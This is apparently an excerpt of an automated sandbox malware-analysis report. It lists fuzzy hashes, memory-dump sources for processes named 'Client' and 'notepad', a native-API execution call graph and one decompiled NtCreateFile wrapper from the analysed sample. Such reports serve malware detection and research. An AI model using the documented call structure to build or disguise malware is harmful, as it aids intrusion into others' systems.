                                                  • Opcode Fuzzy Hash: 958de5bf0826d5cabb16f4849fd014d821921c64b14cacb73adc1fe6982018b5
                                                  • Instruction Fuzzy Hash: 72A14874E142188FCB64DF64D99079DB7F2AF98208F2054EA940EEB794DB34AE84CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00870048 Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53c7e284dd267f54baa8287a627e1038f04880e878bd72a96f1f97c360089385
                                                  • Instruction ID: 85569f9dee4a1d76eadd1c3bb5db4b142c67de3081c1f62ca2fe6d83aabf0cae
                                                  • Opcode Fuzzy Hash: 53c7e284dd267f54baa8287a627e1038f04880e878bd72a96f1f97c360089385
                                                  • Instruction Fuzzy Hash: FC518C30A042188BDB64DB64DD54BDEB7F6AF94304F1054EA840EEB794DF349E888FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0087B508 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1230cedee7db997dee506a485ca232a4858814346dcd6339edfd65406a3a46e
                                                  • Instruction ID: d3db649430045caee44fcf32769a3960de1e45c7408f5866659b41eba21c61e3
                                                  • Opcode Fuzzy Hash: b1230cedee7db997dee506a485ca232a4858814346dcd6339edfd65406a3a46e
                                                  • Instruction Fuzzy Hash: 1E416D75B050098FC704EFA5E9516AAB7B7BBC5304B20E43E910AEB76CDB30DD418B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0087B348 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa7283910a80d099e196ec6e709626fea98378fb1f57875add2525f9f6173bff
                                                  • Instruction ID: 2a0a76dc2a88c3fe6cf0ccbb10a1df5956710fb63a3309169fa798a014386c5e
                                                  • Opcode Fuzzy Hash: aa7283910a80d099e196ec6e709626fea98378fb1f57875add2525f9f6173bff
                                                  • Instruction Fuzzy Hash: 3B318435A041098BC314EB68D98476AB7A3FBC6748B24E52AC10ADB76CDB34DD468791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0087B188 Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a7b40657755cf045343c71cc72b0e010954b17cf8a20092503956f90d59884c
                                                  • Instruction ID: d0e00128e213ad9e0d2edbd48fa457cc3248b1fd138bc0f55d383061868d63d0
                                                  • Opcode Fuzzy Hash: 6a7b40657755cf045343c71cc72b0e010954b17cf8a20092503956f90d59884c
                                                  • Instruction Fuzzy Hash: B631CF31F190188F83049F64E95476A7B77FBC1288BA0A42A810BEB7ACDF70DD0597E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:2%
                                                  Dynamic/Decrypted Code Coverage:2.4%
                                                  Signature Coverage:0.7%
                                                  Total number of Nodes:546
                                                  Total number of Limit Nodes:68
                                                  execution_graph 69079 41f150 69080 41f15b 69079->69080 69082 41b970 69079->69082 69083 41b996 69082->69083 69090 409d40 69083->69090 69085 41b9a2 69089 41b9c3 69085->69089 69098 40c1c0 69085->69098 69087 41b9b5 69134 41a6b0 69087->69134 69089->69080 69137 409c90 69090->69137 69092 409d54 69092->69085 69093 409d4d 69093->69092 69149 409c30 69093->69149 69099 40c1e5 69098->69099 69556 40b1c0 69099->69556 69101 40c23c 69560 40ae40 69101->69560 69103 40c4b3 69103->69087 69104 40c262 69104->69103 69569 4143a0 69104->69569 69106 40c2a7 69106->69103 69572 408a60 69106->69572 69108 40c2eb 69108->69103 69579 41a500 69108->69579 69112 40c341 69113 40c348 69112->69113 69591 41a010 69112->69591 69114 41bdc0 2 API calls 69113->69114 69116 40c355 69114->69116 69116->69087 69118 40c392 69119 41bdc0 2 API calls 69118->69119 69120 40c399 69119->69120 69120->69087 69121 40c3a2 69122 40f4a0 3 API calls 69121->69122 69123 40c416 69122->69123 69123->69113 69124 40c421 69123->69124 69125 41bdc0 2 API calls 69124->69125 69126 40c445 69125->69126 69596 41a060 69126->69596 69129 41a010 2 API calls 69130 40c480 69129->69130 69130->69103 69601 419e20 69130->69601 69133 41a6b0 2 API calls 69133->69103 69135 41a6cf ExitProcess 69134->69135 69136 41af60 LdrLoadDll 69134->69136 69136->69135 69138 409ca3 69137->69138 69188 418bc0 LdrLoadDll 69137->69188 69168 418a70 69138->69168 69141 409cb6 69141->69093 69142 409cac 69142->69141 69171 41b2b0 69142->69171 69144 409cf3 69144->69141 69182 409ab0 69144->69182 69146 409d13 69189 409620 LdrLoadDll 69146->69189 69148 409d25 69148->69093 69530 41b5a0 69149->69530 69152 41b5a0 LdrLoadDll 69153 409c5b 69152->69153 69154 41b5a0 LdrLoadDll 69153->69154 69155 409c71 69154->69155 69156 40f180 69155->69156 69157 40f199 69156->69157 69538 40b040 69157->69538 69159 40f1ac 69542 41a1e0 69159->69542 69163 40f1d2 69164 40f1fd 69163->69164 69549 41a260 69163->69549 69166 41a490 2 API calls 69164->69166 69167 409d65 69166->69167 69167->69085 69190 41a600 69168->69190 69172 41b2c9 69171->69172 69203 414a50 69172->69203 69174 41b2e1 69175 41b2ea 69174->69175 69242 41b0f0 69174->69242 69175->69144 69177 41b2fe 69177->69175 69260 419f00 69177->69260 69508 407ea0 69182->69508 69184 409ad1 69184->69146 69185 409aca 69185->69184 69521 408160 69185->69521 69188->69138 69189->69148 69191 418a85 69190->69191 69193 41af60 69190->69193 69191->69142 69194 41af70 69193->69194 69196 41af92 69193->69196 69197 414e50 69194->69197 69196->69191 69198 414e6a 69197->69198 69199 414e5e 69197->69199 69198->69196 69199->69198 69202 4152d0 LdrLoadDll 69199->69202 69201 414fbc 69201->69196 69202->69201 69204 414d85 69203->69204 69214 414a64 69203->69214 69204->69174 69207 414b90 69271 41a360 69207->69271 69208 414b73 69328 41a460 LdrLoadDll 69208->69328 69211 414b7d 69211->69174 69212 414bb7 69213 41bdc0 2 API calls 69212->69213 69216 414bc3 69213->69216 69214->69204 69268 419c50 69214->69268 69215 414d49 69218 41a490 2 API calls 69215->69218 69216->69211 69216->69215 69217 414d5f 69216->69217 69222 414c52 69216->69222 69337 414790 LdrLoadDll NtReadFile NtClose 69217->69337 69219 414d50 69218->69219 69219->69174 69221 414d72 69221->69174 69223 414cb9 69222->69223 69225 414c61 69222->69225 69223->69215 69224 414ccc 69223->69224 69330 41a2e0 69224->69330 69227 414c66 69225->69227 69228 414c7a 69225->69228 69329 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 69227->69329 69231 414c97 69228->69231 69232 414c7f 69228->69232 69231->69219 69286 414410 69231->69286 69274 4146f0 69232->69274 69234 414c70 69234->69174 69236 414d2c 69334 41a490 69236->69334 69237 414c8d 69237->69174 69240 414caf 69240->69174 69241 414d38 69241->69174 69243 41b101 69242->69243 69244 41b113 69243->69244 69355 41bd40 69243->69355 69244->69177 69246 41b134 69358 414070 69246->69358 69248 41b180 69248->69177 69249 41b157 69249->69248 69250 414070 3 API calls 69249->69250 69252 41b179 69250->69252 69252->69248 69383 415390 69252->69383 69253 41b20a 69254 41b21a 69253->69254 69477 41af00 LdrLoadDll 69253->69477 69393 41ad70 69254->69393 69257 41b248 69472 419ec0 69257->69472 69261 419f1c 69260->69261 69262 41af60 LdrLoadDll 69260->69262 69504 a9fae8 LdrInitializeThunk 69261->69504 69262->69261 69263 419f37 69265 41bdc0 69263->69265 69505 41a670 69265->69505 69267 41b359 69267->69144 69269 41af60 LdrLoadDll 69268->69269 69270 414b44 69269->69270 69270->69207 69270->69208 69270->69211 69272 41a37c NtCreateFile 69271->69272 69273 41af60 LdrLoadDll 69271->69273 69272->69212 69273->69272 69275 41470c 69274->69275 69276 41a2e0 LdrLoadDll 69275->69276 69277 41472d 69276->69277 69278 414734 69277->69278 69279 414748 69277->69279 69281 41a490 2 API calls 69278->69281 69280 41a490 2 API calls 69279->69280 69282 414751 69280->69282 69283 41473d 69281->69283 69338 41bfd0 LdrLoadDll RtlAllocateHeap 69282->69338 69283->69237 69285 41475c 69285->69237 69287 41445b 69286->69287 69288 41448e 69286->69288 69289 41a2e0 LdrLoadDll 69287->69289 69290 4145d9 69288->69290 69294 4144aa 69288->69294 69291 414476 69289->69291 69292 41a2e0 LdrLoadDll 69290->69292 69293 41a490 2 API calls 69291->69293 69298 4145f4 69292->69298 69295 41447f 69293->69295 69296 41a2e0 LdrLoadDll 69294->69296 69295->69240 69297 4144c5 69296->69297 69300 4144e1 69297->69300 69301 4144cc 69297->69301 69351 41a320 LdrLoadDll 69298->69351 69302 4144e6 69300->69302 69303 4144fc 69300->69303 69305 41a490 2 API calls 69301->69305 69306 41a490 2 API calls 69302->69306 69313 414501 69303->69313 69339 41bf90 69303->69339 69304 41462e 69307 41a490 2 API calls 69304->69307 69308 4144d5 69305->69308 69309 4144ef 69306->69309 69310 414639 69307->69310 69308->69240 69309->69240 69310->69240 69321 414513 69313->69321 69342 41a410 69313->69342 69314 414567 69315 41457e 69314->69315 69350 41a2a0 LdrLoadDll 69314->69350 69317 414585 69315->69317 69318 41459a 69315->69318 69319 41a490 2 API calls 69317->69319 69320 41a490 2 API calls 69318->69320 69319->69321 69322 4145a3 69320->69322 69321->69240 69323 4145cf 69322->69323 69345 41bb90 69322->69345 69323->69240 69325 4145ba 69326 41bdc0 2 API calls 69325->69326 69327 4145c3 69326->69327 69327->69240 69328->69211 69329->69234 69331 41af60 LdrLoadDll 69330->69331 69332 414d14 69331->69332 69333 41a320 LdrLoadDll 69332->69333 69333->69236 69335 41a4ac NtClose 69334->69335 69336 41af60 LdrLoadDll 69334->69336 69335->69241 69336->69335 69337->69221 69338->69285 69340 41bfa8 69339->69340 69352 41a630 69339->69352 69340->69313 69343 41a42c NtReadFile 69342->69343 69344 41af60 LdrLoadDll 69342->69344 69343->69314 69344->69343 69346 41bbb4 69345->69346 69347 41bb9d 69345->69347 69346->69325 69347->69346 69348 41bf90 2 API calls 69347->69348 69349 41bbcb 69348->69349 69349->69325 69350->69315 69351->69304 69353 41af60 LdrLoadDll 69352->69353 69354 41a64c RtlAllocateHeap 69353->69354 69354->69340 69356 41bd6d 69355->69356 69478 41a540 69355->69478 69356->69246 69359 414081 69358->69359 69360 414089 69358->69360 69359->69249 69382 41435c 69360->69382 69481 41cf30 69360->69481 69362 4140dd 69363 41cf30 2 API calls 69362->69363 69366 4140e8 69363->69366 69364 414136 69367 41cf30 2 API calls 69364->69367 69366->69364 69486 41cfd0 69366->69486 69368 41414a 69367->69368 69369 41cf30 2 API calls 69368->69369 69371 4141bd 69369->69371 69370 41cf30 2 API calls 69372 414205 69370->69372 69371->69370 69492 41cf90 LdrLoadDll RtlFreeHeap 69372->69492 69374 414334 69493 41cf90 LdrLoadDll RtlFreeHeap 69374->69493 69376 41433e 69494 41cf90 LdrLoadDll RtlFreeHeap 69376->69494 69378 414348 69495 41cf90 LdrLoadDll RtlFreeHeap 69378->69495 69380 414352 69496 41cf90 LdrLoadDll RtlFreeHeap 69380->69496 69382->69249 69384 4153a1 69383->69384 69385 414a50 8 API calls 69384->69385 69387 4153b7 69385->69387 69386 41540a 69386->69253 69387->69386 69388 4153f2 69387->69388 69389 415405 69387->69389 69390 41bdc0 2 API calls 69388->69390 69391 41bdc0 2 API calls 69389->69391 69392 4153f7 69390->69392 69391->69386 69392->69253 69497 41ac30 69393->69497 69396 41ac30 LdrLoadDll 69397 41ad8d 69396->69397 69398 41ac30 LdrLoadDll 69397->69398 69399 41ad96 69398->69399 69400 41ac30 LdrLoadDll 69399->69400 69401 41ad9f 69400->69401 69402 41ac30 LdrLoadDll 69401->69402 69403 41ada8 69402->69403 69404 41ac30 LdrLoadDll 69403->69404 69405 41adb1 69404->69405 69406 41ac30 LdrLoadDll 69405->69406 69407 41adbd 69406->69407 69408 41ac30 LdrLoadDll 69407->69408 69409 41adc6 69408->69409 69410 41ac30 LdrLoadDll 69409->69410 69411 41adcf 69410->69411 69412 41ac30 LdrLoadDll 69411->69412 69413 41add8 69412->69413 69414 41ac30 LdrLoadDll 69413->69414 69415 41ade1 69414->69415 69416 41ac30 LdrLoadDll 69415->69416 69417 41adea 69416->69417 69418 41ac30 LdrLoadDll 69417->69418 69419 41adf6 69418->69419 69420 41ac30 LdrLoadDll 69419->69420 69421 41adff 69420->69421 69422 41ac30 LdrLoadDll 69421->69422 69423 41ae08 69422->69423 69424 41ac30 LdrLoadDll 69423->69424 69425 41ae11 69424->69425 69426 41ac30 LdrLoadDll 69425->69426 69427 41ae1a 69426->69427 69428 41ac30 LdrLoadDll 69427->69428 69429 41ae23 69428->69429 69430 41ac30 LdrLoadDll 69429->69430 69431 41ae2f 69430->69431 69432 41ac30 LdrLoadDll 69431->69432 69433 41ae38 69432->69433 69434 41ac30 LdrLoadDll 69433->69434 69435 41ae41 69434->69435 69436 41ac30 LdrLoadDll 69435->69436 69437 41ae4a 69436->69437 69438 41ac30 LdrLoadDll 69437->69438 69439 41ae53 69438->69439 69440 41ac30 LdrLoadDll 69439->69440 69441 41ae5c 69440->69441 69442 41ac30 LdrLoadDll 69441->69442 69443 41ae68 69442->69443 69444 41ac30 LdrLoadDll 69443->69444 69445 41ae71 69444->69445 69446 41ac30 LdrLoadDll 69445->69446 69447 41ae7a 69446->69447 69448 41ac30 LdrLoadDll 69447->69448 69449 41ae83 69448->69449 69450 41ac30 LdrLoadDll 69449->69450 69451 41ae8c 69450->69451 69452 41ac30 LdrLoadDll 69451->69452 69453 41ae95 69452->69453 69454 41ac30 LdrLoadDll 69453->69454 69455 41aea1 69454->69455 69456 41ac30 LdrLoadDll 69455->69456 69457 41aeaa 69456->69457 69458 41ac30 LdrLoadDll 69457->69458 69459 41aeb3 69458->69459 69460 41ac30 LdrLoadDll 69459->69460 69461 41aebc 69460->69461 69462 41ac30 LdrLoadDll 69461->69462 69463 41aec5 69462->69463 69464 41ac30 LdrLoadDll 69463->69464 69465 41aece 69464->69465 69466 41ac30 LdrLoadDll 69465->69466 69467 41aeda 69466->69467 69468 41ac30 LdrLoadDll 69467->69468 69469 41aee3 69468->69469 69470 41ac30 LdrLoadDll 69469->69470 69471 41aeec 69470->69471 69471->69257 69473 41af60 LdrLoadDll 69472->69473 69474 419edc 69473->69474 69503 a9fdc0 LdrInitializeThunk 69474->69503 69475 419ef3 69475->69177 69477->69254 69479 41af60 LdrLoadDll 69478->69479 69480 41a55c NtAllocateVirtualMemory 69479->69480 69480->69356 69482 41cf40 69481->69482 69483 41cf46 69481->69483 69482->69362 69484 41bf90 2 API calls 69483->69484 69485 41cf6c 69484->69485 69485->69362 69487 41cff5 69486->69487 69488 41d02d 69486->69488 69489 41bf90 2 API calls 69487->69489 69488->69366 69490 41d00a 69489->69490 69491 41bdc0 2 API calls 69490->69491 69491->69488 69492->69374 69493->69376 69494->69378 69495->69380 69496->69382 69498 41ac4b 69497->69498 69499 414e50 LdrLoadDll 69498->69499 69500 41ac6b 69499->69500 69501 414e50 LdrLoadDll 69500->69501 69502 41ad17 69500->69502 69501->69502 69502->69396 69503->69475 69504->69263 69506 41af60 LdrLoadDll 69505->69506 69507 41a68c RtlFreeHeap 69506->69507 69507->69267 69509 407eb0 69508->69509 69510 407eab 69508->69510 69511 41bd40 2 API calls 69509->69511 69510->69185 69514 407ed5 69511->69514 69512 407f38 69512->69185 69513 419ec0 2 API calls 69513->69514 69514->69512 69514->69513 69516 407f3e 69514->69516 69519 41bd40 2 API calls 69514->69519 69524 41a5c0 69514->69524 69517 407f64 69516->69517 69518 41a5c0 2 API calls 69516->69518 69517->69185 69520 407f55 69518->69520 69519->69514 69520->69185 69522 40817e 69521->69522 69523 41a5c0 2 API calls 69521->69523 69522->69146 69523->69522 69525 41af60 LdrLoadDll 69524->69525 69526 41a5dc 69525->69526 69529 a9fb68 LdrInitializeThunk 69526->69529 69527 41a5f3 69527->69514 69529->69527 69531 41b5c3 69530->69531 69534 40acf0 69531->69534 69535 40ad14 69534->69535 69536 40ad50 LdrLoadDll 69535->69536 69537 409c4a 69535->69537 69536->69537 69537->69152 69539 40b054 69538->69539 69540 40b0e0 69539->69540 69554 419c90 LdrLoadDll 69539->69554 69540->69159 69543 41af60 LdrLoadDll 69542->69543 69544 40f1bb 69543->69544 69544->69167 69545 41a7d0 69544->69545 69546 41a7dd 69545->69546 69547 41af60 LdrLoadDll 69546->69547 69548 41a7ef LookupPrivilegeValueW 69547->69548 69548->69163 69550 41a27c 69549->69550 69551 41af60 LdrLoadDll 69549->69551 69555 a9fed0 LdrInitializeThunk 69550->69555 69551->69550 69552 41a29b 69552->69164 69554->69540 69555->69552 69557 40b1f0 69556->69557 69558 40b040 LdrLoadDll 69557->69558 69559 40b204 69558->69559 69559->69101 69561 40ae51 69560->69561 69562 40ae4d 69560->69562 69563 40ae9c 69561->69563 69565 40ae6a 69561->69565 69562->69104 69607 419cd0 LdrLoadDll 69563->69607 69606 419cd0 LdrLoadDll 69565->69606 69566 40aead 69566->69104 69568 40ae8c 69568->69104 69570 40f4a0 3 API calls 69569->69570 69571 4143c6 69569->69571 69570->69571 69571->69106 69573 408a79 69572->69573 69608 4087a0 69572->69608 69575 4087a0 19 API calls 69573->69575 69578 408a9d 69573->69578 69576 408a8a 69575->69576 69576->69578 69626 40f710 10 API calls 69576->69626 69578->69108 69580 41af60 LdrLoadDll 69579->69580 69581 41a51c 69580->69581 69745 a9fea0 LdrInitializeThunk 69581->69745 69582 40c322 69584 40f4a0 69582->69584 69585 40f4bd 69584->69585 69746 419fc0 69585->69746 69588 40f505 69588->69112 69589 41a010 2 API calls 69590 40f52e 69589->69590 69590->69112 69592 41a02c 69591->69592 69593 41af60 LdrLoadDll 69591->69593 69752 a9fc60 LdrInitializeThunk 69592->69752 69593->69592 69594 40c385 69594->69118 69594->69121 69597 41af60 LdrLoadDll 69596->69597 69598 41a07c 69597->69598 69753 a9fc90 LdrInitializeThunk 69598->69753 69599 40c459 69599->69129 69602 41af60 LdrLoadDll 69601->69602 69603 419e3c 69602->69603 69754 aa0078 LdrInitializeThunk 69603->69754 69604 40c4ac 69604->69133 69606->69568 69607->69566 69609 407ea0 4 API calls 69608->69609 69624 4087ba 69609->69624 69610 408a49 69610->69573 69611 408a3f 69612 408160 2 API calls 69611->69612 69612->69610 69615 419f00 2 API calls 69615->69624 69617 41a490 LdrLoadDll NtClose 69617->69624 69620 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 69620->69624 69623 419e20 2 API calls 69623->69624 69624->69610 69624->69611 69624->69615 69624->69617 69624->69620 69624->69623 69627 419d10 69624->69627 69630 4085d0 69624->69630 69642 40f5f0 LdrLoadDll NtClose 69624->69642 69643 419d90 LdrLoadDll 69624->69643 69644 419dc0 LdrLoadDll 69624->69644 69645 419e50 LdrLoadDll 69624->69645 69646 4083a0 69624->69646 69662 405f60 LdrLoadDll 69624->69662 69626->69578 69628 419d2c 69627->69628 69629 41af60 LdrLoadDll 69627->69629 69628->69624 69629->69628 69631 4085e6 69630->69631 69663 419880 69631->69663 69633 4085ff 69638 408771 69633->69638 69684 4081a0 69633->69684 69635 4086e5 69636 4083a0 11 API calls 69635->69636 69635->69638 69637 408713 69636->69637 69637->69638 69639 419f00 2 API calls 69637->69639 69638->69624 69640 408748 69639->69640 69640->69638 69641 41a500 2 API calls 69640->69641 69641->69638 69642->69624 69643->69624 69644->69624 69645->69624 69647 4083c9 69646->69647 69724 408310 69647->69724 69650 4083dc 69651 41a500 2 API calls 69650->69651 69652 408467 69650->69652 69654 408462 69650->69654 69732 40f670 69650->69732 69651->69650 69652->69624 69653 41a490 2 API calls 69655 40849a 69653->69655 69654->69653 69655->69652 69656 419d10 LdrLoadDll 69655->69656 69657 4084ff 69656->69657 69657->69652 69736 419d50 69657->69736 69659 408563 69659->69652 69660 414a50 8 API calls 69659->69660 69661 4085b8 69660->69661 69661->69624 69662->69624 69664 41bf90 2 API calls 69663->69664 69665 419897 69664->69665 69691 409310 69665->69691 69667 4198b2 69668 4198f0 69667->69668 69669 4198d9 69667->69669 69672 41bd40 2 API calls 69668->69672 69670 41bdc0 2 API calls 69669->69670 69671 4198e6 69670->69671 69671->69633 69673 41992a 69672->69673 69674 41bd40 2 API calls 69673->69674 69675 419943 69674->69675 69681 419be4 69675->69681 69697 41bd80 69675->69697 69678 419bd0 69679 41bdc0 2 API calls 69678->69679 69680 419bda 69679->69680 69680->69633 69682 41bdc0 2 API calls 69681->69682 69683 419c39 69682->69683 69683->69633 69685 40829f 69684->69685 69686 4081b5 69684->69686 69685->69635 69686->69685 69687 414a50 8 API calls 69686->69687 69688 408222 69687->69688 69689 41bdc0 2 API calls 69688->69689 69690 408249 69688->69690 69689->69690 69690->69635 69692 409335 69691->69692 69693 40acf0 LdrLoadDll 69692->69693 69694 409368 69693->69694 69696 40938d 69694->69696 69700 40cf20 69694->69700 69696->69667 69718 41a580 69697->69718 69701 40cf4c 69700->69701 69702 41a1e0 LdrLoadDll 69701->69702 69703 40cf65 69702->69703 69704 40cf6c 69703->69704 69711 41a220 69703->69711 69704->69696 69708 40cfa7 69709 41a490 2 API calls 69708->69709 69710 40cfca 69709->69710 69710->69696 69712 41a23c 69711->69712 69713 41af60 LdrLoadDll 69711->69713 69717 a9fbb8 LdrInitializeThunk 69712->69717 69713->69712 69714 40cf8f 69714->69704 69716 41a810 LdrLoadDll 69714->69716 69716->69708 69717->69714 69719 41af60 LdrLoadDll 69718->69719 69720 41a59c 69719->69720 69723 aa0048 LdrInitializeThunk 69720->69723 69721 419bc9 69721->69678 69721->69681 69723->69721 69725 408328 69724->69725 69726 40acf0 LdrLoadDll 69725->69726 69727 408343 69726->69727 69728 414e50 LdrLoadDll 69727->69728 69729 408353 69728->69729 69730 40835c PostThreadMessageW 69729->69730 69731 408370 69729->69731 69730->69731 69731->69650 69733 40f683 69732->69733 69739 419e90 69733->69739 69737 41af60 LdrLoadDll 69736->69737 69738 419d6c 69737->69738 69738->69659 69740 419eac 69739->69740 69741 41af60 LdrLoadDll 69739->69741 69744 a9fd8c LdrInitializeThunk 69740->69744 69741->69740 69742 40f6ae 69742->69650 69744->69742 69745->69582 69747 41af60 LdrLoadDll 69746->69747 69748 419fdc 69747->69748 69751 a9ffb4 LdrInitializeThunk 69748->69751 69749 40f4fe 69749->69588 69749->69589 69751->69749 69752->69594 69753->69599 69754->69604 69757 a9f900 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                  APIs
                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1JA$rMA$rMA
                                                  • API String ID: 2738559852-782607585
                                                  • Opcode ID: d2b46f34e5410bcccec3f92e10d19bae3ee94de036172622466af87796f5b362
                                                  • Instruction ID: 6c02d1606e77c17e30eebbb36dc145a13db086e6251de5938a5ec31c92b5f07b
                                                  • Opcode Fuzzy Hash: d2b46f34e5410bcccec3f92e10d19bae3ee94de036172622466af87796f5b362
                                                  • Instruction Fuzzy Hash: DDF0E2B2200208AFCB14DF99DC80EEB77A9EF8C714F158248BA1DA7241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                  APIs
                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1JA$rMA$rMA
                                                  • API String ID: 2738559852-782607585
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 239 41a35a-41a3b1 call 41af60 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041A35A(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t34;
				void* _t35;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28, _t35);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                  0x0041a36f
                                                  0x0041a377
                                                  0x0041a3ad
                                                  0x0041a3b1

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: e2beb997412d6611f8a4f38b4e921343df11394e3f7af8fcb5cd2edd6e933a0a
                                                  • Instruction ID: e97ca016152ee39ed1797b360af78b315a466cae45add44f3bb0aad21ad5bc4a
                                                  • Opcode Fuzzy Hash: e2beb997412d6611f8a4f38b4e921343df11394e3f7af8fcb5cd2edd6e933a0a
                                                  • Instruction Fuzzy Hash: 63F0BDB2205108AFCB08CF98DC84EEB37AABF8C754F158648FA0DD7241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 242 41a360-41a376 243 41a37c-41a3b1 NtCreateFile 242->243 244 41a377 call 41af60 242->244 244->243
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
